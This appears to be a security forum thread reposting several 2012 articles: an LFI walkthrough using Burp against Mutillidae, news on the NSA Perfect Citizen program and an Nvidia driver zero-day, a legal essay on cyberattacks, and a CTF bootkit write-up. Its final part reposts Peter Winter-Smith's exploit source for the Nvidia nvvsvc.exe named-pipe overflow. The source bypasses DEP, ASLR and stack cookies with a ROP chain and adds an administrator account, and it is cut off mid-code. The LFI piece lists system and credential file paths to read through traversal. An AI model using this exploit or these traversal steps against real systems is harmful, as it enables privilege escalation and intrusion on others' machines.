Nytro

[h=2]Local File Inclusion Exploitation With Burp[/h] Local file inclusion is a vulnerability that allows the attacker to read files that are stored locally through the web application.This happens because the code of the application does not properly sanitize the include() function.So if an application is vulnerable to LFI this means that an attacker can harvest information about the web server.Below you can see an example of PHP code that is vulnerable to LFI. Vulnerable Code to LFI In this article we will use the mutillidae as the target application in order to exploit the local file inclusion flaw through Burp Suite.As we can see and from the next screenshot the user can select the file name and he can view the contents of this just by pressing the view file button. Location of LFI on the Web Application So what we will do is that we will try to capture and manipulate the HTTP request with Burp in order to read system files. Capturing the HTTP Request As we can see from the above request,the web application is reading the files through the textfile variable.So we will try to modify that in order to read a system directory like /etc/passwd.In order to achieve that we have to go out of the web directory by using directory traversal. HTTP Request Modification – /etc/passwd We will forward the request and now we can check the response on the web application as the next image is showing: Reading the /etc/passwd We have successfully read the contents of the /etc/passwd file.Now with the same process we can dump and other system files.Some of the paths that we might want to try are the following: /etc/group /etc/hosts /etc/motd /etc/issue /etc/mysql/my.cnf /proc/self/environ /proc/version /proc/cmdline /etc/group contents etc/hosts contents motd /etc/issue contents mysql configuration file /proc/self/environ /proc/version contents /proc/cmdline contents Conclusion As we saw the exploitation of this vulnerability doesn’t require any particular skill but just knowledge of well-known directories for different platforms.An attacker can discover a large amount of information for his target through LFI just by reading files.It is an old vulnerability which cannot be seen very often in modern web applications. Sursa: https://pentestlab.wordpress.com/2012/12/26/local-file-inclusion-exploitation-with-burp/

NSA 'Perfect Citizen' Program Documents Released, Report By Brian Prince on December 27, 2012 A National Security Agency (NSA) program designed to discover security vulnerabilities at critical infrastructure companies is in full swing, according to documents reportedly obtained by the Electronic Privacy Information Center (EPIC). The program, dubbed 'Perfect Citizen', was unmasked in 2010 in a report by the Wall Street Journal that claimed it involved sensors that monitored networks at critical infrastructure companies. At the time however, the NSA stated publicly the program did not involve "the monitoring of communications or the placement of sensors on utility company systems," and that the project provided a set of technical solutions to help the NSA understand "threats to national security networks." According to CNET, using a Freedom of Information Act (FOIA) request, EPIC obtained 190 pages of files on Perfect Citizen, at least 98 of which were completely deleted for security reasons. The portions that were readable showed that defense company Raytheon received a $91 million contract to build Perfect Citizen and was authorized to hire up to 28 hardware and software engineers to analyze and document vulnerability research against control systems and devices. The program is slated to continue through at least 2014, according to CNET. Marc Rotenberg, executive director of EPIC, told CNET that the documents may help disprove the NSA's claims that Perfect Citizen doesn't involve monitoring private networks. This year has seen multiple reports of the U.S. expanding its efforts to defend cyberspace and develop offensive weapons, including reports about malware such as Stuxnet and Flame linking to secret operations involving the NSA and other agencies. The U.S. has not officially admitted to using cyberweapons in the wild. However, earlier this year, the Washington Post reported the Pentagon was accelerating plans to develop cyberweapons, and that the amount of spending disclosed by the Pentagon on cybersecurity initiatives and technology in 2012 was $3.4 billion. "If your defense is only to try to block attacks you can never be successful," General Keith Alexander, director of the National Security Agency and commander of the US Cyber Command, told a Washington symposium in October. Sursa: NSA 'Perfect Citizen' Program Documents Released, Report | SecurityWeek.Com

[h=1]Nvidia Display Driver Service Attack Escalates Privileges on Windows Machines[/h]by Michael Mimoso There’s nothing like a zero-day to ruin the holiday break, but that’s just what may be in store for engineers at Nvidia after a researcher discovered a new vulnerability in the Nvidia Display Driver Service. The flaw could hand over administrator privileges on Windows machines to an attacker. Peter Winter-Smith, formerly with the NGS Software of the U.K., posted details of the vulnerability and exploit to Pastebin. In it, he explains that the service is vulnerable to a stack buffer overflow that bypasses data execution prevention (DEP) and address space layout randomization (ASLR) running in the Windows operating system since Windows Vista. “The service listens on a named pipe (\pipe\nsvr) which has a NULL DACL configured, which should mean that any logged on user or remote user in a domain context (Windows firewall/file sharing permitting) should be able to exploit this vulnerability,” Winter-Smith wrote on Pastebin. “The buffer overflow occurs as a result of a bad memmove operation.” Winter-Smith told Threatpost the vulnerability is difficult to exploit because it mostly affects domain-based machine, and the machines in question would have to have relaxed firewall rules and need to be able to share files. “In the local scenario in which an attacker attempts to gain increased privileges on a machine they already have access to, it would be very easy,” Winter-Smith said. “It's not incredibly serious (compared to—say--a browser exploit). If it were going to put people at risk I'd not have released exploit code and I'd have informed the vendor and kept quiet until a fix were issued.” Winter-Smith said an attacker could exploit the vulnerability in two ways: with local access they could escalate privileges to root giving them full control over the machine; or remotely against machines on the same Windows domain if the user running Nvidia has enabled file sharing from their machine or has disabled their firewall, remote access can be gained. Memmove operations copy data from a source location to a memory destination. Winter-Smith said the service copies data unchecked; an attacker would be able to control the source location as well as the number of bytes copied into the response buffer; an attacker would be able to leak data from the stack by overflowing it. “The memmove function copies data from one place in memory to another, and the fact that it was not properly used allowed me to both copy data critical to bypassing the Windows protections,” Winter-Smith said, “by copying private data in memory within the Nvidia service process into the data buffer that would be sent back to me, and trigger the vulnerability (by overwriting memory sufficient to give me full control over what the Nvidia service would try to do once the processing of my messages had completed).” Nvidia, based in Santa Clara, Calif., builds graphics processing units for PCs, mobile and embedded devices, as well as other processing applications for high-performance computing systems. Nvidia competes with Intel, AMD and Qualcomm in these markets. The nvsvc32.exe service in question here runs automatically on any Windows machine running a Nvidia GPU. Winter-Smith said he wanted to share the exploit in a timely fashion, rather than report it. “I am definitely not averse to responsible disclosure and typically do follow a responsible disclosure process, however the risk from this particular flaw being exploited was (is) sufficiently low that I didn't think it would warrant the wait,” he said. Sursa: Nvidia Display Driver Service Attack Escalates Privileges on Windows Machines | threatpost

[h=1]The cyber attacks on Saudi Aramco, RasGas, and U.S. banks in the context of international law[/h]Dimitar Kostadinov December 26, 2012 Introduction When it was created, the Internet was launched as a classified military experiment, but nowadays it is a widely used tool that has a multitude of purposes. Recent cyber attacks on Saudi Arabia’s state oil company Saudi Aramco, the Qatari gas firm RasGas, and denial-of-service attacks on some major U.S. banks come as evidence that the battlefield is shifting from a three-dimensional to a linear front, and this tendency may also result in an overall drastic change of warfare standards. In spite of the obvious improvement of life standards which this technological revolution brought, the great dependency on computers may open a new page of warfare conduct. Because international law is hampered by constraints imposed before the advent of cyber attacks, one of the most significant challenges today is withstanding this rapid advance of computer technology. Jus ad bellum and cyber warfare. Interaction and specifics of “use of force” and “armed attack” terms The most essential jus ad bellum provisions are Article 2(4), the prohibition on the use of force, and article 51 of the UN Charter, the use of self-defense. These norms bind all states whether or not they are members of the United Nations. Although the UN Charter is drafted long before the emergence of the Internet and cyber attacks respectively, its provisions regulate any use of force. This fact is being affirmed by the International Court of Justice (ICJ): Article 2(4) and Article 51 are applicable to “any use of force, regardless of the weapons employed.”(ICJ, 1996) Among most scholars, there is no doubt that cyber attacks could qualify as a use of force pursuant to Article 2(4) and self-defense as in Article 51. Consequently, the UN Charter system, as well as the customary international law, regulates the conflicts in which the parties can use computer systems to inflict harm on each other (Robertson, 2002). In relation to the aforementioned provisions, there are two significant terms—”use of force” (Article 2(4)) and “armed attack” (Article 51)—which seem to have a certain correlation between them. A careful textual analysis ascertains that both terms have different purposes and scope. While the concept of “use of force” seems to be broader in meaning, the term “armed force” is directly related to severe cases to threats to the peace, breach of the peace, or acts of aggression (Schmitt, 1999). In the Nicaragua case (1985), the ICJ affirms that there is a difference between a “use of force” and an “armed attack”. The court adopts the view that an armed attack constitutes a higher degree as it bears direct infliction of death/injury on human beings or physical damage on property. This distinction made by the court does not tie the hands of states when it suffers an information operation that does not rise to the standard of ‘armed attack’. Simply, it means they should restrain their response short of military action (Schmitt, 2003). The distinction between an armed attack and the use of force is premeditated. The current U.N. scheme precludes responses, especially unilateral actions, to acts which do not rise to the level of an armed attack. The type and level of response to cyber attacks Similar to the terrorist acts, cyber attacks are initiated without warning and often, the result of the attack is noticeable within seconds after it has been launched, thus giving the victim almost no time to react. Usually, the level and type of response to the use of force is determined more or less by the extent of the impact of the initial strike. A cyber attack directed against a minor target that is not meant to cause grave consequences, such as death/injury or destruction/damage, would most probably not be viewed as an armed attack. Moreover, the state’s prerogative to respond to the use of force in self-defense is regulated by the necessity and proportionality tenets: Necessity The principle of necessity justifies a more decisive action when all peaceful means are exhausted and there are no further options to settle the conflict any other way than through the use of forceful methods. Proportionality The proportionality tenet regulates the quantity of the countermeasures used. They must be proportional and adequate to those used in the initial attack made by the aggressor. Not exactly clear is the situation when the uses of force do not reach the threshold of an armed attack. Both unilateral attack and collective self-defense are not allowed. Nonetheless, although reprisals infringe on the international law, acts like retorsion have become increasingly popular and often occur in cyber warfare. The attacks on Saudi Aramco, RasGas, and the US banks are thought to be retaliation strikes for the Stuxnet worm, which was allegedly devised by the joint efforts of US and Israeli specialists and designed to undermine Iran’s nuclear ambitions (Sale, 2012). International law prohibits such attacks, butone way to cope with this situation is to address the issue to the UN Security Council, with the hope of getting permission for a forceful response not related to armed attack under Article 39 of the Charter. Unilateral responses are restricted without authorization from the Security Council. When passive defensive measures prove themselves incapable of preventing an aggressive act, then the injured State has the right to retrieve reparations for the damages suffered. Of course, in accordance with the current international law, such a claim would only be possible if there is an actual agreement on cyber attacks between the states in question (Creekman, 2002). The current warfare legislation and Schmitt’s scheme The state practice concerning applying the jus ad bellum legal framework to cyber attacks, more specifically the use of force notion, is vague and ambiguous. Even though the current jus ad bellum and in bello do not regulate cyber attacks well, they can still serve as “a model for devising rules.” One way to adjust the notion of cyber attacks is to shape it with the help of the general principles and pre-existing legal frames for conventional armed attacks. Such an adjustment must stay by all means flexible and should not be performed in a merely prohibitive manner (Brown, 2006). As an alternative, Michael Schmitt, the Chairman of International Law Department at the United States Naval War College, proposes a scheme of factors that may prove useful when a person evaluates whether a cyber attack constitutes a use of force and/or resembles a conventional armed attack (Schmitt, 2011). These factors are: Severity This is the most important factor because it gives information about the negative consequences of a cyber attack. The Shamoon virus destroyed the hard drives of most of Aramco’s computers and erased the data on management servers which were of utmost importance for the company. U.S. Defense Secretary Leon Panetta claims that cyber attacks “could be as destructive as the terrorist attack of 9/11,” whether conducted by a state or non-state actors (Riley & Engleman, 2012). (2) Immediacy This criterion is also important because it indicates how soon the consequences emerge after the impact. If the results are evident soon after the attack, as is often the case with cyber attacks, the chance for a peaceful solution or other viable alternative decreases. Conversely, there are many concerns about computer methods like logic and time bombs whose real consequences appear with some delay (Schmitt, 2011). Shamoon’s code has an embedded timer that was set to attack at the exact time that Aramco’s computers were struck (Perlroth, 2012). (3) Directness This factor accentuates on the chain of causation of a cyber attack and assesses the line of events that would eventually lead from the act to the results (Schmitt, 1999). The Shamoon virus, as well as the Stuxnet worm, hit their targets causing direct negative consequences—data erasure or system malfunctions. (4) Invasiveness A factor related to the level of penetration in a secured system. The unauthorized armed attacks usually cross into another country’s border and they impair significantly the sovereignty of the victim state. Hence, the stability of the target state is threatened and the authority of the government and its institutions is undermined (Schmitt, 1999). The infected computers at Saudi Aramco weren’t connected to the Internet, and according to the officials involved in the investigation, the virus was distributed from a USB memory stick by an employee of the company (Sale, 2012). (5) Measurability This criterion identifies the consequences in terms of quantity. If the indicator shows that the number is too high, then the state’s interest is more likely to be impaired (Schmitt, 1999). In terms of numbers, the attack on Saudi Aramco wiped the data on 30, 000 computers, whereas the Stuxnet worm temporarily took 1,000 centrifuges at the Natanz nuclear plant out of order. (6) Presumptive Legitimacy Schmitt concludes that if an act is not prohibited, then it is permitted. The main reason is that international law tries to make the interpretation and implementation process simpler and also because it is prohibitive by nature (Schmitt, 2011). Erasing important information from the computers of a major oil company, sabotaging the functionality of a nuclear plant, and performing denial-of-service attacks on banks and financial institutions is however, by any means, illegitimate. (7) Responsibility An indicator which stands to show when a state is responsible for a cyber attack. The level of involvement of a state in a certain operation is the key here. If the state in question is deeply involved in a particular cyber attack, then this occurrence is more likely to be categorized as a use of force (Schmitt, 2011). Nevertheless, a cyber attack must be duly attributed first before a state is held responsible. The Attribution Requirement A very important issue is the attribution of the relevant actions to a state. The attribution of an attack to state agents is a condicio sine qua non under international law because of the potential misguidance of a counter strike towards an “innocent” computer system (Graham, 2010). When the attacker is a state actor, then the countermeasures must observe the jus ad bellum and jus in bello prescriptions pursuant to the UN Charter and customary international law (Condron, 2007). There is this predominant conviction in international jurisprudence that only states can be adversaries and are entitled to the right to use force in the sense of the UN Charter, and that non-state actors are excluded from the scope of Article 2(4) (Barkham, 2001). Non–state actors like individuals, organized groups, and terrorist organizations need to be linked to a state in order to bear responsibility under this article, otherwise their actions may violate the domestic law of the country which they belong to but not the prohibition on the use of force (Schmitt, 2003). Supposedly, most cyber attacks are conducted by individuals. The members of various terrorist organizations have gradually become more and more computer literate (Graham, 2010); for example, the minor hacker group “Cutting Sword of Justice,” which took the responsibility for the cyber attack on Aramco, consists only of about 100 participants. It is thought that this group is covertly sponsored by the Iranian government. However, the direct and affirmative attribution to another state may be a difficult task to deal with because of the inherent anonymity of these attacks. The forensic officials involved in the Aramco investigation are not certain that the incident was an Iranian act. On the other hand, the forensic conclusion could not prove with certainty that the cyber attack wasn’t executed by a non-state actor. The virus could have been simplified on purpose (Riley & Engleman, 2012). However, there is a general conviction that Iran is behind all of the recent cyber attacks. Conclusion The probability of grave cyber attacks imposes an obligation to policymakers to generally reconsider the manner in which they conduct the protection of computer networks and devices, especially those which are an underlying segment of a critical national infrastructure. Clearly, cyber attacks present an enormous challenge to the jus ad bellum norms because those norms were elaborated well before the emergence of the Internet. Taking into account the significant damage of the cyber attacks on Saudi Aramco, RasGas, the US banks, as well as the Stuxnet hit at Natanz, the international community must realize completely the fact that grave cyber attacks are not myth, but reality, and that more decisive measures regarding this threat and its existence within the jus ad bellum framework are needed. Reference List Barkham, J. (2001). Information warfare and international law on the use of force. N.Y.U.J. INT’L L. & POL 57, 34. Brown, D. (2006). A Proposal for an International Convention To Regulate the Use of Information Systems in Armed Conflict. Harvard: Harv. Int’l L.J. Condron, S. (2007). Getting it right: Protecting American critical infrastructure in cyber space. Harvard Law Review, 20, 403-422. Creekman, D. (2002). A helpless America? An examination of the legal options available to the United States in responding to varying types of cyber attacks. Am. U. Int’L L. Rev, 3, 641-681. Graham, D. (2010). Cyber threats and the law of war. Journal of National Security Law and Policy, 4, 87-104. International Court of Justice (1996). The legality of the threat or use of nuclear weapons. Retrieved from International Court of Justice International Court of Justice (1986). Military and Paramilitary Activities in and against Nicaragua (Nicaragua v. United States of America).Retrieved from International Court of Justice Perlroth, N. (2012). In Cyberattack on Saudi Firm, U.S. Sees Iran Firing Back. Retrieved from http://www.nytimes.com/2012/10/24/business/global/cyberattack-on-saudi-oil-firm-disquiets-us.html?pagewanted=all Riley M. & Engleman R. (2012). Code in Aramco Cyber Attack Indicates Lone Perpetrator. Retreived from Code in Aramco Cyber Attack Indicates Lone Perpetrator - Bloomberg Robertson, H. B. (2002). Self-Defense against computer network attack. I NT’L L. STUD, 76, 121-123. Sale, R. (2012). Saudi Insider Likely Key to Aramco Cyber-Attack. Retrieved from http://www.ipsnews.net/2012/10/saudi-insider-likely-key-to-aramco-cyber-attack/ Schmitt, M. (1999). Computer network attack and use of force in international law. Columbia Journal of Transnational Law, 37, 885-937. Schmitt, M., Harrison D., Heather A., & Winfield, T. (2004). Computers and war: The legal battlespace. Harvard Program on Humanitarian Policy and Conflict Research. Schmitt, M. (2011). Cyber operations and the jus ad bellum revisited. Villanova Law Review, 56, 569-606. Sursa: InfoSec Institute Resources – The cyber attacks on Saudi Aramco, RasGas, and U.S. banks in the context of international law

[h=3]PHDays CTF Quals – BINARY 500 or Hiding Flag Six Feet Under (MBR Bootkit + Intel VT-x)[/h]PHDays CTF Quals took place on December 15-17, 2012. More than 300 teams participated in this event and fought to become a part of PHDays III CTF, which is going to be held in May 2013. Our team had been developing the tasks for this competition for two months. And this article is devoted to the secrets of one of them – Binary 500. This task is very unusual and hard-to-solve, so nobody could find its flag. This executable file is an MBR bootkit, which uses hardware virtualization (Intel VT-x). Due to the program’s specific features, we decided to warn users that this program should be executed on a virtual machine or an emulator only. Warning and license agreement Dropper Let’s start with the dropper overview. The main goal of this module is very simple. It is to write files extracted from a resource section into a self-made hidden file system and replace original MBR with a self-made one. It also saves original MBR in the file system. There are few things, which complicate the dropper analysis. First of all, it is written in C++ using STL, OOP, and virtual functions. That’s why all the calls are indirect. Virtual function calls in IDA Pro Secondly, all the disk operations are carried out via the SCSI controller. Instead of the usual ReadFile/WriteFile functions, we use DeviceIoControl with the control code SCSI_PASS_THROUGH_DIRECT, which allows us to communicate with the hard drive on a lower level. All the files from the resources are encrypted using RC4 and a 256-bit key. The next thing is the hidden file system. Its structure is pretty simple. The system grows from the end and is written two sectors before the end of the hard drive. First DWORD is a number of files XORed with constant 0x8FC54ED2. Then a directory with information about the files goes: struct MiniFsFileEntry { DWORD fileIndex; DWORD fileOffset; DWORD fileSize; }; The file index is just a constant related to a specific file. Offset is counted in bytes relative to the file system start. MiniFs file system structure MBR After the dropper ends its operation, it becomes obvious that we have nothing left to do with the operating system and just need to reboot and start debugging the master boot record. There are several ways to debug MBR. There’s no doubt we can analyse it on a real machine using a hardware debugger, but it’s inconvenient and expensive. That is why we recommend to use the VMWare virtual machine (you need to configure an image configuration file at first) connecting to it with the help of the GDB debugger (this method has significant drawbacks, which will be described later) or the Bochs emulator. The main advantage of these methods is that you can use the IDA Pro debugger for analysis and it’s very convenient! Having chosen our instruments, we are able to get started. The first part of MBR is really simple, and there shouldn’t be any problems with its analysis. It only reads the second part of our MBR (Extended MBR) from the hard drive and writes it to the memory at address 0x7e00 (right after the first part). This operation is important because BIOS maps just the first 512 bytes of MBR and our code exceeds this size. Analyzing extended MBR, a good specialist will immediately understand that something is wrong, namely that the loader is obfuscated. Comparison of MBR source code with the IDA Pro analysis Obfuscation is complicated mainly by indirect function calls. At the very beginning AX registers the address of a function, which scans a specific table (containing function indexes and related offsets) to get the offset of a function to be called. After the function is fulfilled, the control is returned right after the function index constant (return address + 2). Function table in MBR MBR obfuscation algorithm MBR code is pretty simple: Retrieves hard drive features. Reads original MBR from the hidden file system. Replaces our MBR with original MBR at the 0x7c00 address. Reads and decrypts a hypervisor loader from the file system. Reads and decrypts a hypervisor body from the file system. Prepares parameters and passes control to the hypervisor loader. It should be mentioned that a set of bytes of Bochs BIOS was used for encryption of the hypervisor loader and body. It makes the program system-specific, because it runs correctly only on the Bochs emulator. We decided to use this method for several reasons. Firstly, debugging of Intel VT-x hardware virtualization is possible only on a real machine or using Bochs 2.4.5 or later (so we are already tied to this emulator). Secondly, we didn't want the participants to find encryption keys in the program and decrypt all the hypervisor parts using the static analysis without the debugger. Thirdly, this method prevents users from damaging systems on real machines. To help the participants, we had published information that they would need Bochs emulator with a working OS image to solve one of the tasks in advance. VMX Loader Hardware virtualization is not a new term. It started to spread in 2006 – 2007 when the most well-known CPU developers (Intel and AMD) released processors, which could support related instruction sets. Details on the virtual machine monitor will be provided in the next section. This section will touch upon the methods how to prepare the system for the hardware hypervisor. As it was mentioned above, it is possible to debug an application, which uses Intel VT-x virtualization, only on real machine or using Bochs 2.4.5 or above, but it is not the only problem. The default emulator build does not support hardware virtualization. That is why we had to compile our own build of Bochs and provide a link to it in the first hint to the task. The main goal of the hypervisor loader is to move the hypervisor’s body above the first megabyte and transfer control to its entry point. However, it carries out some non-trivial operations, which will be covered below. There are several input parameters including a base address, which is used as a code segment base. It is set by a far jump. Then the CPUID instruction checks that code is executed on the Intel system (zero function) and that hardware virtualization is supported by the processor (first function). Let’s take a closer look. Firstly, we call CPUID with value 1 in the EAX register. After the execution, the fifth bit of the ECX register (VMX flag) should be checked. If it is set, then hardware virtualization is supported. To check if virtualization is blocked on the early boot stages (BIOS), we need to read 0x3A MSR register. If the first bit of the EAX register is set after RDMSR instruction execution and the second bit is clear then virtualization is blocked. Then the loader calls a function, which reads the system memory map. This is achieved by calling interrupt 0x15 in the cycle with the 0xE820 value in the EAX register. That’s how the buffer is filled with records of memory regions. Then the memory map is checked for a free area suitable for the monitor body. If such a memory is found, it is marked as reserved. To move monitor body above the first megabyte, we need to switch the processor from a real mode to a protected or long mode. We decided to switch directly to the long mode as the hypervisor body works in it. We need to satisfy several conditions: prepare paging structures (PML4, PDPT, a number of PDs for 2MB pages), set PAE bit in the CR4 register, load the PML4 address to the CR3 register, set up GDTR with the long-mode segment registers, set the LMA bit in the MSR EFER register and set the PG and PE bits in the CR0 register. After these operations, we should make a far jump to switch the processor to the long mode. We noticed at this moment that the IDA Pro 6.1 debugger has a bug, which prevents it from calculating a correct far address, and it shows users some garbage data (this bug is fixed in IDA 6.3). It seems that IDA does not use register values from the Bochs debugger and makes wrong calculations by itself. That is why we recommended the participants to use the built-in Bochs debugger. The last step is to copy the body to the destination address and transfer control to the entry point. VMX Hypervisor Specifically for this task we wrote a thin hypervisor, which: Enters the VMX-root mode. Sets the VMCS structure to start the guest system in the real mode starting from the 0x7c00 address. Sets up guest exit handlers. Starts a guest by executing the VMLAUNCH instruction. The main goal of a participant is to find a guest system exit handler and analyze its code. Flag Obtaining the virtual machine exit handler, a participant came to the final stretch, and only a small task was needed to be solved. It is obvious from handler's code that if the CPUID instruction causes an exit and the EIP register contains a specific value then the handler creates an array (32 bytes) from the values of the registers EAX, ECX, EDX, EBX, ESI, EDI, ESP, EBP and then this array is checked for validity. The handler inserts vector (x_0,…,x_31 ) to the set of equations of the following type: If the equality is satisfied then the vector is valid and used as a key for buffer decryption. Therefore, a participant needs to solve a set of 32 equations with 32 variables. The only thing that complicates the analysis is that the validation algorithm uses a floating point unit (FPU) instruction set. There is one more (final) MBR in the encrypted buffer which contains a plaintext flag. This bootstrap substitutes the original MBR, and its goal is to display the flag on the screen. Example of a displayed flag Test application Specifically for testing, we have developed an application, which allocates memory to a given address, writes CPUID and a few other instructions with regard to a specific offset (address + offset = the needed EIP value), sets up registers and passes control to the given address. Therefore, when the CPUID instruction is carried out, the hypervisor takes control over, checks the register values, and reboots the system displaying the flag on the screen. Example of a test application Conclusion Developing this application, we wanted to create something unusual, a program which would be interesting for the whole team, because to solve this task, the participants needed to have skills in Win32 reverse engineering, analysis of MBR executed in the real mode, encryption and obfuscation algorithms analysis. This task required both static and dynamic analyses. The participants needed to have basic knowledge of hardware virtualization and assembler x86-64; to use their mathematical skills to obtain the flag. We really hope that we managed to interest both the participants and the readers of this review! From the authors We decided to write this task three weeks before the start of the qualifications and were absolutely sure that would finish very soon, but our expectations were not met. We had finished the task just a few hours before PHDays CTF Quals started and did not have any time to test it or fix the bugs. We were only sure that it was possible to obtain the flag, but the operating system ran not so well in the virtual environment. It displayed blue screens of death from time to time and didn't want to boot after resetting the system. While writing this article, we had some time to fix the bugs and release a more stable task. Unfortunately, this time was not enough either to regulate the operating system. Follow the links to download the last version of the task and watch the video demonstrating the task and test application operation. Thanks to everybody! Max Grigoryev, Sergey Kovalev, Positive Research Sursa: Positive Research Center: PHDays CTF Quals – BINARY 500 or Hiding Flag Six Feet Under (MBR Bootkit + Intel VT-x)

[h=1]ScanPlanner : NMAP now Online[/h]by Black on December 27, 2012 As we know most of the services are going on cloud or software as services, ScanPlanner is an expample of those sites. We can use NMAP free for online scanning. ScanPlanner is the easiest, fastest way to run NMAP scans and tests from the web. Schedule and track your network scans and vulnerability tests with our intuitive online interface. ScanPlanner is both free and paid services as per our need we can use it. We can schedule your regular network scans as frequently as you like and quickly compare results with you scan history. But One-pass scans are always free. For our Professional Tools suite, “pay as you go” plan means paying only for what you need. Plans start as low as $9.95 per month. Graphic, data-rich reports alert you to important changes in your network. Professional tool suite helps you assess risks and vulnerabilities, as well as suggested action. There are lot of benifites of useing these sevices live infra, support, and other Operating system dependencies but there are also risks involved in using these services. [h=3]Click here to read nore or use ScanPlanner[/h] Sursa: http://www.pentestit.com/scanplanner-nmap-online/

NVidia Display Driver Buffer Overflow Authored by Peter Winter-Smith This is an exploit for a stack buffer overflow in the NVidia Display Driver Service. The service listens on a named pipe (\pipe\nsvr) which has a NULL DACL configured, which should mean that any logged on user or remote user in a domain context (Windows firewall/file sharing permitting) should be able to exploit this vulnerability. /* NVidia Display Driver Service (Nsvr) Exploit - Christmas 2012 - Bypass DEP + ASLR + /GS + CoE ============================================================= (@peterwintrsmith) Hey all! Here is an exploit for an interesting stack buffer overflow in the NVidia Display Driver Service. The service listens on a named pipe (\pipe\nsvr) which has a NULL DACL configured, which should mean that any logged on user or remote user in a domain context (Windows firewall/file sharing permitting) should be able to exploit this vulnerability. The buffer overflow occurs as a result of a bad memmove operation, with the stack layout effectively looking like this: [locals] [received-data] [response-buf] [stack cookie] [return address] [arg space] [etc] The memmove copies data from the received-data buffer into the response-buf buffer, unchecked. It is possible to control the offset from which the copy starts in the received-data buffer by embedding a variable length string - which forms part of the protocol message being crafted - as well as the number of bytes copied into the response buffer. The amount of data sent back over the named pipe is related to the number of bytes copied rather than the maximum number of bytes that the buffer is able to safely contain, so it is possible to leak stack data by copying from the end of the received-data buffer, through the response-buf buffer (which is zeroed first time round, and second time round contains whatever was in it beforehand), right to the end of the stack frame (including stack cookie and return address). As the entire block of data copied is sent back, the stack cookie and nvvsvc.exe base can be determined using the aforementioned process. The stack is then trashed, but the function servicing pipe messages won't return until the final message has been received, so it doesn't matter too much. It is then possible to exploit the bug by sending two further packets of data: One containing the leaked stack cookie and a ROP chain dynamically generated using offsets from the leaked nvvsvc.exe base (which simply fills the response-buf buffer when this data is echoed back) and a second packet which contains enough data to trigger an overwrite if data is copied from the start of the received-data buffer into the response-buf (including the data we primed the latter to contain - stack cookie and ROP chain). Allowing the function to then return leads to execution of our ROP chain, and our strategically placed Metasploit net user /add shellcode! We get continuation of execution for free because the process spins up a thread to handle each new connection, and there are no deadlocks etc. I've included two ROP chains, one which works against the nvvsvc.exe running by default on my Win7/x64 Dell XPS 15/ NVidia GT540M with drivers from the Dell site, and one which works against the latest version of the drivers for the same card, from: http://www.geforce.co.uk/hardware/desktop-gpus/geforce-gt-540m http://www.geforce.co.uk/drivers/results/54709 Hope you find this interesting - it's a fun bug to play with! - Sample Session - C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator Peter The command completed successfully. C:\Users\Peter\Desktop\NVDelMe1>nvvsvc_expl.exe ** Nvvsvc.exe Nsvr Pipe Exploit (Local/Domain) ** [@peterwintrsmith] - Win7 x64 DEP + ASLR + GS Bypass - Christmas 2012 - Usage: nvvsvc_expl.exe <ip>|local !! If exploiting remotely, create a session with the target using your domain credentials !! Command: net use \\target.ip\ipc$ /u:domain\user password C:\Users\Peter\Desktop\NVDelMe1>nvvsvc_expl.exe 127.0.0.1 ** Nvvsvc.exe Nsvr Pipe Exploit (Local/Domain) ** [@peterwintrsmith] - Win7 x64 DEP + ASLR + GS Bypass - Christmas 2012 - Action 1 of 9: - CONNECT Action 2 of 9: - CLIENT => SERVER Written 16416 (0x4020) characters to pipe Action 3 of 9: - SERVER => CLIENT Read 16504 (0x4078) characters from pipe Action 4 of 9: Building exploit ... => Stack cookie 0xe2bad48dd565: => nvvsvc.exe base 0x13f460000: Action 5 of 9: - CLIENT => SERVER Written 16416 (0x4020) characters to pipe Action 6 of 9: - SERVER => CLIENT Read 16384 (0x4000) characters from pipe Action 7 of 9: - CLIENT => SERVER Written 16416 (0x4020) characters to pipe Action 8 of 9: - SERVER => CLIENT Read 16896 (0x4200) characters from pipe Action 9 of 9: - DISCONNECT C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator Peter r00t The command completed successfully. */ #include <stdio.h> #include <Windows.h> enum EProtocolAction { ProtocolAction_Connect = 0, ProtocolAction_Receive, ProtocolAction_Send, ProtocolAction_Disconnect, ProtocolAction_ReadCookie, }; typedef struct { EProtocolAction Action; PBYTE Buf; DWORD Length; } ProtocolMessage; const int GENERIC_BUF_LENGTH = 0x10000; #define WriteByte(val) {buf[offs] = val; offs += 1;} #define WriteWord(val) {*(WORD *)(buf + offs) = val; offs += 2;} #define WriteDword(val) {*(DWORD *)(buf + offs) = val; offs += 4;} #define WriteBytes(val, len) {memcpy(buf + offs, val, len); offs += len;} #define BufRemaining() (sizeof(buf) - offs) DWORD WritePipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer) { DWORD dwWritten = 0; if(WriteFile(hPipe, pBuffer, cbBuffer, &dwWritten, NULL)) return dwWritten; return 0; } DWORD ReadPipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer, BOOL bTimeout = FALSE) { DWORD dwRead = 0, dwAvailable = 0; if(bTimeout) { for(DWORD i=0; i < 30; i++) { if(!PeekNamedPipe(hPipe, NULL, NULL, NULL, &dwAvailable, NULL)) goto Cleanup; if(dwAvailable) break; Sleep(100); } if(!dwAvailable) goto Cleanup; } if(!ReadFile(hPipe, pBuffer, cbBuffer, &dwRead, NULL)) goto Cleanup; Cleanup: return dwRead; } HANDLE EstablishPipeConnection(char *pszPipe) { HANDLE hPipe = CreateFileA( pszPipe, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL ); if(hPipe == INVALID_HANDLE_VALUE) { return NULL; } return hPipe; } BYTE *BuildMalicious_LeakStack() { static BYTE buf[0x4020] = {0}; UINT offs = 0; WriteWord(0x52); for(UINT i=0; i<0x2000; i++) WriteWord(0x41); WriteWord(0); WriteDword(0); WriteDword(0x4078); WriteDword(0x41414141); WriteDword(0x41414141); WriteDword(0x41414141); WriteDword(0x41414141); WriteDword(0x41414141); return buf; } BYTE *BuildMalicious_FillBuf() { static BYTE buf[0x4020] = {0}; UINT offs = 0; WriteWord(0x52); WriteWord(0); // string WriteDword(0); WriteDword(0x4000); while(BufRemaining()) WriteDword(0x43434343); return buf; } BYTE *BuildMalicious_OverwriteStack() { static BYTE buf[0x4020] = {0}; UINT offs = 0; WriteWord(0x52); WriteWord(0); // string WriteDword(0); WriteDword(0x4340); // enough to copy shellcode too while(BufRemaining()) 